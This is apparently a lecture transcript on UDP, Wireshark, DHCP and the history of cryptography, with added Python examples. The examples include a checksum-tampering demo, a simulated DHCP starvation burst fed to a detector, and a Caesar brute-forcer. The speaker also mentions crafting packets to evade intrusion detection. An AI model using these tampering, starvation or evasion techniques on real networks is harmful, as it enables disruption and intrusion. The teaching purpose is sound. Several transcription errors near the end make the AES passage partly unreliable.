So here you see that DNS is using UDP, and what we've got here is another UDP packet with a destination and all sorts of stuff, so you can see it out here; you can see the checksum and its unverified checksum status. So you can check out all sorts of stuff using Wireshark. So that was about UDP, or the User Datagram Protocol.
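To make the header layout and the checksum point concrete, here is an added example (written for this edit, not code from the video or from Wireshark) that parses the eight-byte UDP header, computes the UDP checksum over the IPv4 pseudo-header exactly as a receiving stack does, and then shows what the man-in-the-middle remark above means: flipping one payload byte breaks the checksum, and recomputing it makes the altered datagram look valid again. The addresses, ports and payload are constructed sample values.

```python
"""UDP header parsing and checksum verification (Python standard library only)."""
import struct

UDP_HEADER_LEN = 8  # source port, destination port, length, checksum: four 16-bit fields


def ones_complement_sum(data: bytes) -> int:
    """16-bit one's-complement sum used by the IPv4, UDP and TCP checksums."""
    if len(data) % 2:
        data += b"\x00"  # RFC 768: an odd trailing byte is padded with zero for the sum
    total = sum(struct.unpack(f"!{len(data) // 2}H", data))
    while total >> 16:  # fold carries back into the low 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return total


def udp_checksum(src_ip: bytes, dst_ip: bytes, segment: bytes) -> int:
    """Checksum over the IPv4 pseudo-header, the UDP header (checksum zeroed) and the payload."""
    pseudo_header = src_ip + dst_ip + struct.pack("!BBH", 0, 17, len(segment))  # 17 = UDP
    zeroed = segment[:6] + b"\x00\x00" + segment[8:]
    checksum = (~ones_complement_sum(pseudo_header + zeroed)) & 0xFFFF
    return checksum or 0xFFFF  # 0 means "no checksum" on IPv4, so a computed 0 is sent as 0xFFFF


def parse_udp(segment: bytes) -> dict:
    """Split a UDP segment into its header fields and payload; the only sanity check is the length."""
    src_port, dst_port, length, checksum = struct.unpack("!HHHH", segment[:UDP_HEADER_LEN])
    return {
        "src_port": src_port,
        "dst_port": dst_port,
        "length": length,
        "checksum": checksum,
        "payload": segment[UDP_HEADER_LEN:],
        "length_ok": length == len(segment),
    }


def build_udp(src_port: int, dst_port: int, payload: bytes, src_ip: bytes, dst_ip: bytes) -> bytes:
    """Assemble a UDP segment with a correct checksum."""
    header = struct.pack("!HHHH", src_port, dst_port, UDP_HEADER_LEN + len(payload), 0)
    segment = header + payload
    return segment[:6] + struct.pack("!H", udp_checksum(src_ip, dst_ip, segment)) + segment[8:]


def verify_udp(src_ip: bytes, dst_ip: bytes, segment: bytes) -> bool:
    """What a receiving stack checks: the length field matches, and the checksum matches if present."""
    fields = parse_udp(segment)
    if not fields["length_ok"]:
        return False
    if fields["checksum"] == 0:
        return True  # sender omitted the checksum (allowed on IPv4); nothing to verify
    return udp_checksum(src_ip, dst_ip, segment) == fields["checksum"]


def tamper_demo() -> tuple:
    """Show that the checksum catches corruption but not an attacker who recomputes it.

    Returns (original_valid, tampered_valid, repaired_valid)."""
    src_ip, dst_ip = bytes([192, 168, 1, 10]), bytes([192, 168, 1, 53])  # constructed addresses
    payload = b"\x12\x34\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00"  # constructed DNS-like query start
    original = build_udp(1853, 53, payload, src_ip, dst_ip)
    # A faulty middlebox flips the first payload byte but leaves the checksum alone: detectable.
    tampered = original[:8] + b"X" + original[9:]
    # An attacker on the path simply recomputes the checksum: undetectable at this layer.
    repaired = tampered[:6] + struct.pack("!H", udp_checksum(src_ip, dst_ip, tampered)) + tampered[8:]
    return (
        verify_udp(src_ip, dst_ip, original),
        verify_udp(src_ip, dst_ip, tampered),
        verify_udp(src_ip, dst_ip, repaired),
    )


if __name__ == "__main__":
    print(parse_udp(build_udp(1853, 52081, b"hello", bytes([10, 0, 0, 1]), bytes([10, 0, 0, 2]))))
    print(tamper_demo())
```

The pseudo-header is why Wireshark can only show "unverified" until it knows the surrounding IP addresses: the UDP checksum covers the source and destination IP as well, so a datagram replayed to a different host fails verification even though the UDP bytes are untouched.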

Okay. So now that we're done with the User Datagram Protocol, let's talk about addressing modes. Addressing modes are how you address a packet to your different destinations, and there are three kinds.

The first kind of addressing mode is unicast, which is pretty simple to understand: there is one source and one destination, and the source sends the packet to the destination. How the conversation flows depends on the protocol you're using on top of it. If it's something like TCP, you have a bidirectional, connection-oriented stream: the blue computer can talk to the red computer and the red computer can talk back to the blue computer over the same connection, and both can be sending at the same time. With UDP there is no connection at all; each datagram stands on its own, so blue sends datagrams to red and red, if it wants to reply, just sends its own datagrams back to blue, with nothing in the protocol tying the two directions together. I'm not sure I'm using the best words, but I hope I'm driving home the point: TCP gives you a two-way connection, UDP gives you independent one-way datagrams.

Now moving on, there's also broadcast. Broadcast means that you are sending your packet to everybody on the network segment: one source sends one single message and every host on that local network receives it. A rough analogy is the cell broadcast messages you get from mobile network providers, where one sender pushes the same advertisement about a new postpaid plan from Vodafone or another carrier to every handset in the area. On an IP network the equivalent is a packet sent to the broadcast address of the subnet, which every host on that subnet picks up.

Then there's multicast. Multicast is like broadcast but selective: the packet is delivered only to the hosts that have joined a particular multicast group, not to everybody on the network. Something like streaming your screen to multiple viewers is the kind of thing multicast is for, because a computer that hasn't subscribed to the group doesn't receive the stream. So those are the three modes of addressing: unicast, broadcast and multicast.

Okay, now moving on, let's look into the tool that we just used once in the UDP section, that is Wireshark. So what exactly is Wireshark? This utility called Wireshark is a packet capture utility, meaning that it grabs data that's either going out of or coming into a specific network interface. There are a number of reasons why this may be useful or important. One reason why it's really important is that what's going on in the network is always accurate. In other words, you can't mess around with things once they're on the network, and you can't lie about something that's actually on the network, as compared with applications and their logs, which can be misleading or inaccurate. If an attacker gets into an application they may be able to alter the logging, and there are several other behaviors that make it difficult to see what's really going on inside an application, but on the network you can really see what's going on. Once it hits the wire, it's on the wire and you can't change that fact. Of course the capture only shows what crossed the point where you captured it, and encrypted payloads stay opaque, but the packets themselves are a record the endpoints cannot rewrite after the fact.

So what we're going to do here is a quick packet capture. Let me just open up Wireshark for you guys. As you can see, I already have Wireshark open for us; let me just remove the CDP filter that was there, so Wireshark is capturing. So let's go over the stuff you can see on the screen, some important features of Wireshark, so that we can use it later on when we start to do some more significant work. I select the interface that I'm using primarily, which is my Wi-Fi, and I'm going to go over and bring up a Google page so that we can see what's happening on the network. As you can see, it's capturing a bunch of data that's going on here. Let me open up a Google page, and that's going to send out some data. Let's go back: it's dumping a whole bunch of stuff off the network. I'm going to stop that, go back and take a look at some of the messages here.

So some of the features of Wireshark: as you can see on the top part of the screen, there's a window with columns that say number, time, source, destination, protocol, length and info, and those are all of the packets that have been captured. The numbering starts from 1, and the time is relative to the point at which we started capturing. You see the source and destination addresses, the protocol, the length of the packet in bytes, and some information about the packet. At the bottom of the screen you'll see detailed information about the packet that has been selected.

So suppose I'm selecting this TCP packet out here. We can go through the frame; the frame also has an interface ID, its encapsulation type and all sorts of information about the frame. Then we can look at the source port, destination port, sequence number, the flags, the checksums. You can basically check everything about a packet, because this is a packet analyzer and a packet sniffer.

Now, you'll see some detailed information about the packet that I selected. So I selected this TCP/IP packet, and we see in the middle pane that it says frame 298. It means that it's the 298th packet, and the packet that was captured was 66 bytes, and we grabbed 66 bytes, 528 bits. Then what you see out here is the source and the destination MAC address, the layer 2 address, and then you can see the IP address of both source and destination, and it says it's a TCP packet and gives us a source port and a destination port, and we can start drilling down into different bits of the packet. When I select a particular section of the packet, down at the very bottom you can see what's actually a hex dump of the packet, and on the right-hand side is the ASCII. So this is the hex dump and the ASCII you're looking at.

What's really cool about Wireshark is that it really pulls the packet apart into the different layers that we have spoken about, the different layers of the OSI and the TCP/IP model. The packets are put into different layers, and there are a couple of different models we can talk about with that, but what Wireshark does really nicely is demonstrate those layers for us. As we can see here, it's actually four layers in this particular packet.

Here we can also do something. So I've got a Google web request. What I want to do here is filter based on HTTP, so I type a filter; let's see if we can do an http filter. What I see here says text input and it's going to get an image, a PNG image, and this is a request to get the icon that's going to be displayed in the address bar. You also see something called ARP here, which I'll be talking about very soon. So let's just let the filtering finish. Now in the web browser it's a favicon.ico that it's fetching. What I can do here is select Analyze and then Follow TCP Stream, and you can see all the requests related to this particular request, and it breaks them down very nicely. You can see we've sent some requests to Spotify, because I've been using Spotify to listen to some music, and then you can see all sorts of stuff, like this was a request to some not-found resource. So let's just take the Spotify one, and you can see that we get a bunch of information from the Spotify connection. At least you can see the destination and the source; it's an Intel machine. The first part of the MAC address, the first few digits, is the vendor ID, or OUI, so Intel has its own vendor ID, and F4:96 probably tells us that's an Intel network card. Wireshark does this really neat little thing where it also tells us, from the MAC address itself, what kind of device you're sending your packets to. So it's coming from a Sophos device and going to an Intel network card, and the type is IPv4.

So that was all about Wireshark. You can use it extensively for packet sniffing and packet analysis. Packet analysis comes in very handy when you're trying to figure out how to do some stuff like IDS evasion, where you want to craft your own packets and you want to analyze the packets that are going into the IDS to see which packets are actually getting detected as an intrusion, so you can craft your packets in a way that doesn't get detected by the IDS. So this is a very nifty little tool. We'll be talking about how you can craft your own packets in just a little while, but for now, let's move ahead.
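Wireshark's middle pane is just the result of peeling each header off in turn. Here is an added example (not part of the video and not Wireshark code) that does the same thing by hand on a constructed Ethernet frame carrying an IPv4/TCP HTTP request: it decodes Ethernet, IPv4 and TCP, classifies the destination MAC as unicast, broadcast or multicast from the group bit (the link-layer counterpart of the addressing modes discussed earlier), pulls out the OUI the way Wireshark's vendor resolution does (without a vendor table), and renders the hex-plus-ASCII bytes pane. The MACs, IPs and payload are constructed; the IPv4 header checksum is left at zero in the sample frame and is reported but not verified.

```python
"""Hand-rolled dissector for Ethernet / IPv4 / TCP frames, in the spirit of Wireshark's detail pane."""
import struct

TCP_FLAG_NAMES = [(0x01, "FIN"), (0x02, "SYN"), (0x04, "RST"), (0x08, "PSH"), (0x10, "ACK"), (0x20, "URG")]
BROADCAST_MAC = b"\xff" * 6


def fmt_mac(mac: bytes) -> str:
    return ":".join(f"{b:02x}" for b in mac)


def mac_type(mac: bytes) -> str:
    """Link-layer addressing mode: the low bit of the first byte is the individual/group bit."""
    if mac == BROADCAST_MAC:
        return "broadcast"
    return "multicast" if mac[0] & 0x01 else "unicast"


def parse_ethernet(frame: bytes) -> dict:
    dst, src, ethertype = struct.unpack("!6s6sH", frame[:14])
    return {
        "dst": fmt_mac(dst), "dst_type": mac_type(dst), "dst_oui": fmt_mac(dst[:3]),
        "src": fmt_mac(src), "src_oui": fmt_mac(src[:3]),
        "type": ethertype, "payload": frame[14:],
    }


def parse_ipv4(data: bytes) -> dict:
    ver_ihl, _tos, total_len, ident, _flags_frag, ttl, proto, checksum, src, dst = struct.unpack(
        "!BBHHHBBH4s4s", data[:20])
    ihl = (ver_ihl & 0x0F) * 4  # header length in bytes; options follow the fixed 20 bytes
    return {
        "version": ver_ihl >> 4, "header_len": ihl, "total_len": total_len, "id": ident,
        "ttl": ttl, "proto": proto, "checksum": checksum,
        "src": ".".join(map(str, src)), "dst": ".".join(map(str, dst)),
        "payload": data[ihl:total_len],  # anything beyond total_len is padding, not IP payload
    }


def parse_tcp(data: bytes) -> dict:
    sport, dport, seq, ack, offset_byte, flags, window, checksum, _urg = struct.unpack("!HHIIBBHHH", data[:20])
    header_len = (offset_byte >> 4) * 4
    return {
        "src_port": sport, "dst_port": dport, "seq": seq, "ack": ack, "header_len": header_len,
        "flags": [name for bit, name in TCP_FLAG_NAMES if flags & bit],
        "window": window, "checksum": checksum, "payload": data[header_len:],
    }


def hexdump(data: bytes, width: int = 16) -> list:
    """Wireshark-style bytes pane: offset, hex bytes, printable ASCII with dots for the rest."""
    lines = []
    for off in range(0, len(data), width):
        chunk = data[off:off + width]
        hexpart = " ".join(f"{b:02x}" for b in chunk).ljust(width * 3 - 1)
        asciipart = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        lines.append(f"{off:04x}  {hexpart}  {asciipart}")
    return lines


def dissect(frame: bytes) -> dict:
    """Peel the layers off in order, like the protocol tree in Wireshark's middle pane."""
    layers = {"eth": parse_ethernet(frame)}
    if layers["eth"]["type"] == 0x0800:  # IPv4
        layers["ip"] = parse_ipv4(layers["eth"]["payload"])
        if layers["ip"]["proto"] == 6:  # TCP
            layers["tcp"] = parse_tcp(layers["ip"]["payload"])
            layers["app"] = layers["tcp"]["payload"]
    return layers


def build_sample_frame() -> bytes:
    """Constructed frame: locally administered MACs, a TEST-NET-3 server, one HTTP GET."""
    http = b"GET /favicon.ico HTTP/1.1\r\nHost: example.test\r\n\r\n"
    tcp = struct.pack("!HHIIBBHHH", 51514, 80, 0x1000, 0x2000, 5 << 4, 0x18, 65535, 0, 0)  # PSH|ACK
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp) + len(http), 0x1234, 0x4000, 64, 6, 0,
                     bytes([192, 168, 1, 10]), bytes([203, 0, 113, 5]))
    eth = struct.pack("!6s6sH", bytes.fromhex("02000000000b"), bytes.fromhex("02000000000a"), 0x0800)
    return eth + ip + tcp + http


if __name__ == "__main__":
    result = dissect(build_sample_frame())
    for layer, fields in result.items():
        print(layer, fields.decode() if layer == "app" else fields)
    print("\n".join(hexdump(build_sample_frame())))
```

Feed it a real frame read from a pcap and the same functions work unchanged; the only thing missing compared with Wireshark is the vendor table behind the OUI and the thousands of higher-layer dissectors.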

Okay. So now that we're done with our small introduction to and brief overview of Wireshark, let's move on to our next topic for the video, that is DHCP.

Okay. So DHCP is a protocol and it stands for Dynamic Host Configuration Protocol. DHCP is a network management protocol used to dynamically assign an Internet Protocol address to any device on the network so that it can communicate using IP. DHCP automates and centrally manages these configurations rather than requiring a network administrator to manually assign IP addresses to all the network devices. DHCP can be implemented on small local networks as well as in large enterprises. DHCP will assign new IP addresses in each location when devices are moved from place to place, which means network administrators do not have to manually configure each device with a valid IP address. So if a device that has a dynamically assigned IP address is moved to a new location on the network, it doesn't need any sort of reconfiguration. Versions of DHCP are available for use with Internet Protocol version 4 and Internet Protocol version 6 (DHCPv6).

Now, what you see on your screen is a very simplistic diagram of how DHCP works, so let me just run you through it. DHCP runs at the application layer of the TCP/IP protocol stack, over UDP (port 67 on the server side and 68 on the client side), to dynamically assign IP addresses to DHCP clients and to hand out TCP/IP configuration information to those clients. This includes the subnet mask, the default gateway and the Domain Name System server addresses.

DHCP is a client-server protocol in which servers manage a pool of unique IP addresses, as well as information about client configuration parameters, and assign addresses out of those address pools. DHCP-enabled clients send a request to the DHCP server whenever they connect to a network: a client configured for DHCP broadcasts a request for a DHCP server and asks for the network information for the local network to which it is attached. A client typically broadcasts this query immediately after booting up. The DHCP server responds to the client's request by providing IP configuration information previously specified by a network administrator. This includes a specific IP address as well as the time period, called the lease, for which the allocation is valid. When refreshing an assignment, a DHCP client requests the same parameters, but the DHCP server may assign a new IP address based on the policies set by the administrator.

Now, a DHCP server manages a record of all the IP addresses it allocates to network nodes. If a node is relocated in the network, the server identifies it using its Media Access Control address, which prevents accidentally configuring multiple devices with the same IP address.

DHCP is not a routable protocol, nor is it a secure one. DHCP is limited to a specific local area network, which means a single DHCP server per LAN is adequate. Larger networks may have a wide area network containing multiple individual locations; depending on the connections between these points and the number of clients in each location, multiple DHCP servers can be set up to handle the distribution of addresses. If network administrators want a DHCP server to provide addressing to multiple subnets on a given network, they must configure DHCP relay services on the interconnecting routers that DHCP requests have to cross; these relay agents forward messages between DHCP clients and servers. DHCP also lacks any built-in mechanism that would allow clients and servers to authenticate each other, so both sides are vulnerable to deception (a rogue server answering faster than the real one and handing out a malicious gateway or DNS server, or a client claiming another host's hardware address) and to attacks where rogue clients exhaust a DHCP server's pool by requesting leases under many fabricated MAC addresses.
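The exchange and the exhaustion attack just described, as an added example that is not part of the video: the code below builds a real DHCPDISCOVER (the 236-byte BOOTP header, the magic cookie and the TLV option list), parses one back, and then runs a simple detector over a constructed timeline of messages. Because nothing in DHCP authenticates the client, a pool-exhaustion attack is just a stream of DISCOVERs from ever-changing hardware addresses, and that is exactly what the detector looks for. Transaction IDs, MACs, hostnames and the window/threshold values are constructed assumptions.

```python
"""DHCPDISCOVER construction/parsing and a DHCP-starvation detector (standard library only)."""
import struct

DHCP_MAGIC = b"\x63\x82\x53\x63"
# 236 bytes: op, htype, hlen, hops, xid, secs, flags, ciaddr, yiaddr, siaddr, giaddr, chaddr, sname, file
BOOTP_HEADER = "!BBBBIHH4s4s4s4s16s64s128s"
MESSAGE_TYPES = {1: "DISCOVER", 2: "OFFER", 3: "REQUEST", 4: "DECLINE", 5: "ACK", 6: "NAK", 7: "RELEASE", 8: "INFORM"}
OPT_HOSTNAME, OPT_MSG_TYPE, OPT_PARAM_LIST, OPT_END = 12, 53, 55, 255


def build_discover(xid: int, mac: bytes, hostname: bytes = b"") -> bytes:
    """A client's first message: no addresses yet, broadcast flag set, identified only by chaddr."""
    zero4 = b"\x00" * 4
    header = struct.pack(BOOTP_HEADER, 1, 1, 6, 0, xid, 0, 0x8000,
                         zero4, zero4, zero4, zero4, mac.ljust(16, b"\x00"), b"\x00" * 64, b"\x00" * 128)
    options = bytes([OPT_MSG_TYPE, 1, 1])               # option 53 = DISCOVER
    options += bytes([OPT_PARAM_LIST, 4, 1, 3, 6, 15])  # ask for subnet mask, router, DNS, domain name
    if hostname:
        options += bytes([OPT_HOSTNAME, len(hostname)]) + hostname
    return header + DHCP_MAGIC + options + bytes([OPT_END])


def parse_dhcp(packet: bytes) -> dict:
    """Decode the fixed BOOTP header and the TLV option list that follows the magic cookie."""
    fields = struct.unpack(BOOTP_HEADER, packet[:236])
    op, _htype, hlen, _hops, xid, _secs, flags = fields[:7]
    chaddr = fields[11][:hlen]
    if packet[236:240] != DHCP_MAGIC:
        raise ValueError("not a DHCP message (magic cookie missing)")
    options, i, body = {}, 0, packet[240:]
    while i < len(body) and body[i] != OPT_END:
        if body[i] == 0:  # pad option, no length byte
            i += 1
            continue
        code, length = body[i], body[i + 1]
        options[code] = body[i + 2:i + 2 + length]
        i += 2 + length
    msg_type = MESSAGE_TYPES.get(options.get(OPT_MSG_TYPE, b"\x00")[0], "UNKNOWN")
    return {"op": op, "xid": xid, "broadcast": bool(flags & 0x8000),
            "chaddr": ":".join(f"{b:02x}" for b in chaddr), "options": options, "msg_type": msg_type}


def max_discover_clients(events, window_s: float = 10.0) -> int:
    """Largest number of distinct client MACs that sent DISCOVER inside any window_s span.

    events: iterable of (timestamp_seconds, raw_dhcp_packet)."""
    discovers = sorted((t, parse_dhcp(p)["chaddr"]) for t, p in events
                       if parse_dhcp(p)["msg_type"] == "DISCOVER")
    best = 0
    for i, (t0, _) in enumerate(discovers):
        in_window = {mac for t, mac in discovers[i:] if t - t0 <= window_s}
        best = max(best, len(in_window))
    return best


def starvation_suspected(events, window_s: float = 10.0, threshold: int = 20) -> bool:
    """A burst of DISCOVERs from many never-seen MACs is the signature of pool exhaustion."""
    return max_discover_clients(events, window_s) >= threshold


# Constructed traffic: one real host retrying once, and a rogue client cycling fabricated MACs.
NORMAL_EVENTS = [(0.0, build_discover(0x11111111, bytes.fromhex("020000000001"), b"laptop")),
                 (4.0, build_discover(0x11111111, bytes.fromhex("020000000001"), b"laptop"))]
ATTACK_EVENTS = [(0.1 * i, build_discover(0x1000 + i, bytes([0x02, 0, 0, 0, 0, i]))) for i in range(30)]

if __name__ == "__main__":
    print(parse_dhcp(NORMAL_EVENTS[0][1]))
    print("normal:", starvation_suspected(NORMAL_EVENTS), "attack:", starvation_suspected(ATTACK_EVENTS))
```

The threshold should be set from what a quiet segment actually shows (a lab with thirty machines booting after a power cut will legitimately exceed twenty); the point is that the server itself has no way to tell the two cases apart, which is why defenses such as DHCP snooping and per-port MAC limits live on the switch rather than in the protocol.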

Okay. So let's move on to our next topic, and that is why use DHCP. I just told you that DHCP doesn't really have any sort of authentication, so it can be fooled really easily. So what are the advantages of using DHCP? DHCP offers quite a lot of advantages.

Firstly, IP address management. A primary advantage of DHCP is easier management of IP addresses in a network. Without DHCP you must manually assign IP addresses; you must be careful to assign a unique IP address to each client and configure each client individually, and if a client moves to a different network you must make manual modifications for that client. When DHCP is enabled, the DHCP server manages the assignment of IP addresses without the administrator's intervention, and clients can move to other subnets without manual reconfiguration, because they obtain new client information appropriate for the new network from a DHCP server.

Apart from that, DHCP also provides centralized network client configuration. It has support for BOOTP clients, it supports both local and remote clients, it supports network booting, and it has support for large networks and not only for small-scale ones. So that way you see DHCP has a wide array of advantages, even though it doesn't really have any authentication. Because of these advantages DHCP finds widespread use in a lot of organizations. Okay, so that winds up DHCP for us.

So let us go into the history of cryptography now. Let me give you a brief history. Cryptography actually goes back several thousand years: shortly after people began to find ways to communicate, there were some who were finding ways to make the understanding of that communication difficult, so that other people couldn't understand what was going on. This led to the development of the Caesar cipher, which was used by Julius Caesar, and it's a simple rotation cipher. By that I mean you rotate the alphabet by a fixed number of positions, and that shift is the key.

So here's an example. We've got two rows of letters that are in alphabetical order, meaning we basically write the alphabet out, and the second row is shifted by three letters. So A in the first row lines up with D in the second row, B with E, and so on, wrapping around at the end so that X becomes A, Y becomes B and Z becomes C. That's an example of how the encryption works. If you try to encrypt a word like HELLO, it looks like complete gibberish after it comes out of the algorithm: if you count the letters out, you can see that H becomes K, E becomes H, L becomes O and O becomes R, so HELLO becomes KHOOR. So that's a Caesar cipher.

Now you may have seen things like ROT13, which means that you rotate by 13 letters instead of three. It's the same thing again, just a simple rotation cipher, and with 13 the same operation applied twice gets you back to the plaintext. The ROT of course stands for rotate or rotation.
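The rotation cipher above and the reason it is only of historical interest, as an added example that is not part of the video: the same function does Caesar (shift 3) and ROT13, and because there are only 25 possible keys, `crack` simply tries all of them and keeps the candidate that looks most like English. The scoring here uses a constructed eight-word list standing in for a dictionary; a real attack would use letter frequencies or a full word list, but the key space is so small that almost any scoring works.

```python
"""Caesar/ROT-N cipher and a brute-force break of it (Python standard library only)."""
import string


def rotate(text: str, shift: int) -> str:
    """Shift every ASCII letter by `shift` positions, wrapping around; other characters are left alone."""
    out = []
    for ch in text:
        if ch.isascii() and ch.isalpha():
            base = ord("A") if ch.isupper() else ord("a")
            out.append(chr((ord(ch) - base + shift) % 26 + base))
        else:
            out.append(ch)
    return "".join(out)


def caesar_encrypt(plaintext: str, shift: int = 3) -> str:
    return rotate(plaintext, shift)


def caesar_decrypt(ciphertext: str, shift: int = 3) -> str:
    return rotate(ciphertext, -shift)


def rot13(text: str) -> str:
    """ROT13 is its own inverse: 13 + 13 = 26, a full turn of the alphabet."""
    return rotate(text, 13)


# Constructed mini word list standing in for a dictionary (assumption for this example).
COMMON_WORDS = {"THE", "AND", "AT", "TO", "WILL", "SEND", "ATTACK", "DAWN"}


def english_score(text: str) -> int:
    """Count words that appear in the word list; higher means 'looks more like English'."""
    return sum(1 for word in text.upper().split() if word.strip(string.punctuation) in COMMON_WORDS)


def brute_force(ciphertext: str) -> list:
    """Only 25 keys exist, so try every one and rank the results. Returns (score, shift, plaintext)."""
    candidates = [(english_score(rotate(ciphertext, -s)), s, rotate(ciphertext, -s)) for s in range(1, 26)]
    candidates.sort(key=lambda c: c[0], reverse=True)
    return candidates


def crack(ciphertext: str) -> tuple:
    """Return (shift, plaintext) of the best-scoring candidate."""
    _, shift, plain = brute_force(ciphertext)[0]
    return shift, plain


if __name__ == "__main__":
    message = "THE ENEMY WILL ATTACK THE EASTERN GATE AT DAWN SEND REINFORCEMENTS TO THE BRIDGE"
    secret = caesar_encrypt(message, 3)
    print(secret)
    print(crack(secret))
```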

Now coming forward a couple of thousand years, we have the Enigma cipher. Enigma was originally the trade name of the machine, developed in Germany in the 1920s and later adopted by the German military, but it is the name the people trying to crack it made famous. The Germans used this machine, which was capable of encrypting and decrypting messages, to send messages to and from different battlefields and waterfronts. That's the same problem the Caesar cipher solved, which Caesar used to communicate with his battlefield generals: you've got to get messages from headquarters down to where the people are actually fighting, and you don't want them to be intercepted in between by the enemy. So therefore you use encryption, and lots of energy was spent by the Allies, and in particular the British, trying to decrypt the messages. This is one of the first instances that we are aware of where a machine was used to do the actual encryption.

Now we're going to come ahead a few decades, into the 1970s, where it was felt that there was a need for a digital encryption standard. The US National Bureau of Standards, which is now the National Institute of Standards and Technology (NIST), is responsible for that sort of thing, so they put out a request for proposals for an encryption standard and an encryption algorithm. What ended up happening was IBM came up with an encryption algorithm that was based on the Lucifer cipher, which one of their people, Horst Feistel, had been working on a couple of years previously. They put this proposal together based on Lucifer in 1974, and in 1977 that proposal for an encryption algorithm was the one that was chosen to be the Data Encryption Standard, and so it came to be known as DES.

Over time it became apparent that there was a problem with this, and that was that it only had a 56-bit key size. While in the 1970s that was considered adequate to defend against brute forcing and breaking, by the 1990s it was no longer considered adequate, and there was a need for something more. It took time to develop something that would last for a long period of time, so in the meantime a stopgap was developed, and this stopgap is what we call Triple DES. The reason it's called Triple DES is that you apply the DES algorithm three times in different ways, and you use three different keys to do that.

So here's how Triple DES works. Your first 56-bit key is used to encrypt the plaintext just like you would with the standard DES algorithm. Then you take the ciphertext that's returned from the first round of encryption and you apply the decryption algorithm to that ciphertext. However, the key thing to note is that you don't use the first key to decrypt, because otherwise you'd just get the plaintext back. So what you do is use a second key with the decryption algorithm against the ciphertext from the first round. Now you've got some ciphertext that has been encrypted with one key and decrypted with a second key, and we take the ciphertext from that and apply a third key using the encryption portion of the algorithm to receive a whole new set of ciphertext. Obviously, to do the decryption you do the reverse: with the third key you decrypt it, with the second key you encrypt it, and then with the first key you decrypt it. So you do the reverse order and the reverse operation at each step to undo Triple DES. We get a nominal key size of 168 bits, but it's still only operating on 64-bit blocks with 56 bits of key at a time, and because of the meet-in-the-middle attack the effective strength is about 112 bits rather than 168.

Now I said Triple DES was only a stopgap. What we were really looking for was the Advanced Encryption Standard. Once again NIST requested proposals so that they could replace the Data Encryption Standard, and in 2001, after several years of looking for algorithms, looking them over and getting them evaluated, they selected an algorithm that was put together by two Belgian cryptographers, Joan Daemen and Vincent Rijmen. The algorithm was called Rijndael, and that became the Advanced Encryption Standard, or AES. One of the biggest advantages of AES is that it supports multiple key lengths: currently what you'll typically see is that we are using 128-bit keys; however, AES supports up to 256-bit keys. So if we get to the point where 128 bits isn't enough, we can move all the way up to 256 bits of keying material.

So cryptography has a really long history. Currently we are in a state where we have a reasonably stable encryption standard in AES, but the history of cryptography shows that with every generation of encryption, eventually people find a way to crack it. Okay. So that was a brief history of cryptography.

So now that I've given you a brief history of how we have reached the encryption standards that we're following today, that is the Advanced Encryption Standard, let's go ahead and talk a little bit more about DES, Triple DES and AES.

So DES is the Data Encryption Standard. It was developed by IBM in the 1970s, and originally it was a cipher named Lucifer; after some modifications IBM proposed it as the Data Encryption Standard, it was selected, and ever since then it's been known as DES. One thing that caused a little bit of controversy was that during the process of selection the NSA requested some changes, and it hasn't been particularly clear what all of those changes were. There has been some speculation that the NSA was requesting a back door into the Data Encryption Standard which would allow them to look at encrypted messages in the clear; basically, it would always give the NSA the ability to decrypt DES-encrypted messages. What is publicly known is that the S-boxes were altered and the key was shortened to 56 bits; the S-box changes later turned out to strengthen DES against differential cryptanalysis, while the short key is what eventually killed it. DES remained the encryption standard for the next couple of decades or so.

So what is DES and how does it work? Basically it uses a 56-bit key. Rather than a stream cipher, it's a block cipher, and it uses 64-bit blocks. In 1998 DES was effectively broken when a DES-encrypted message was cracked in about three days by a purpose-built brute-force machine, and then a year later a network of around 10,000 systems around the world cracked a DES-encrypted message in less than a day. It's just gotten worse since then, with modern computing power being what it is today.

Now, since DES was created and broken, we knew we needed something else, and what came in between DES and the Advanced Encryption Standard is Triple DES. Triple DES isn't three times the strength of DES, necessarily; it's really DES applied three times. What I mean by that is we take a plaintext message, let's call that P, and we use a key called K1 to encrypt the message, and that's going to result in ciphertext one, so we'll call that C1. Now C1 is the output of the first round of encryption, and we're going to apply a second key called K2, and with that second key we go through a decryption process on C1. Since it's the wrong key we are not going to get the plaintext out of the decryption process; on the other end we get another round of ciphertext, and we'll call that C2. Now with C2 we apply a third key, K3, and we encrypt ciphertext C2, and that results in ciphertext C3. So we have three different keys applied in two different ways: with K1 and K3 we do a round of encryption, with K2 we do a round of decryption. So it's basically an encrypt-decrypt-encrypt (EDE) process with three separate keys. The decrypt in the middle is also what makes Triple DES backward compatible: set all three keys equal and the first two steps cancel out, leaving plain single DES.

But it doesn't really yield the full strength of a 168-bit key. Nominally it's three 56-bit keys, so you could say it's a 168-bit key, but it is not the same strength, because the meet-in-the-middle attack lets you attack the outer layers of a multiple-encryption scheme separately, which brings the effective security of three-key Triple DES down to about 112 bits, and with only two distinct keys (K1 = K3) to less than that. It also inherits the 64-bit block size of DES, which is why it is no longer recommended for new designs. And if DES itself can be brute-forced, you know that Triple DES can be broken too; it just takes longer if you don't know the keys and you're relying on a brute-force attack.

So triple Des was literally


a stop gap between Des and AES

because people knew

that we needed something


more than triple des and for

this the NISD

or the National
Institute of Standards

and technology in 2001.

They chose a s as the algorithm

that is now called


Advanced encryption algorithm.

So it was originally called


the rijndael algorithm.

And the main thing


about the rijndael algorithm

and advanced encryption


standard algorithm.

Is that the rijndael

algorithm specifically
States in its papers

that it has available block size

and available key size


as long as they are

in multiples of 32.

So 32 6496 like that.

But what AES does differently is


that it gives you one block size

that is 128 bits and gives


you three different key sizes

that is 128 192 and 256.

So with AES three


different key lens,

but one block size.

Okay, so that was a little bit


more information on a yes this

and triple des

and we are going


to be using this information

in some subsequent lessons


Okay now moving on.

Okay. So now that we've discussed the history of cryptography and, more importantly, the cryptography algorithms, let's discuss the different types of cryptography.

Now, the first type of cryptography I'm going to talk about is symmetric cryptography, and by symmetric cryptography I mean the key is the same for encrypting or decrypting. So I use the same key whether I am encrypting the data or decrypting the data. One thing about symmetric key cryptography is that it uses a shorter key length than asymmetric cryptography, which I'll get into in a couple of minutes. It's also faster than asymmetric, and you can use algorithms like DES or AES, as those are both symmetric key cryptography algorithms, and you can use a utility like AESCrypt.

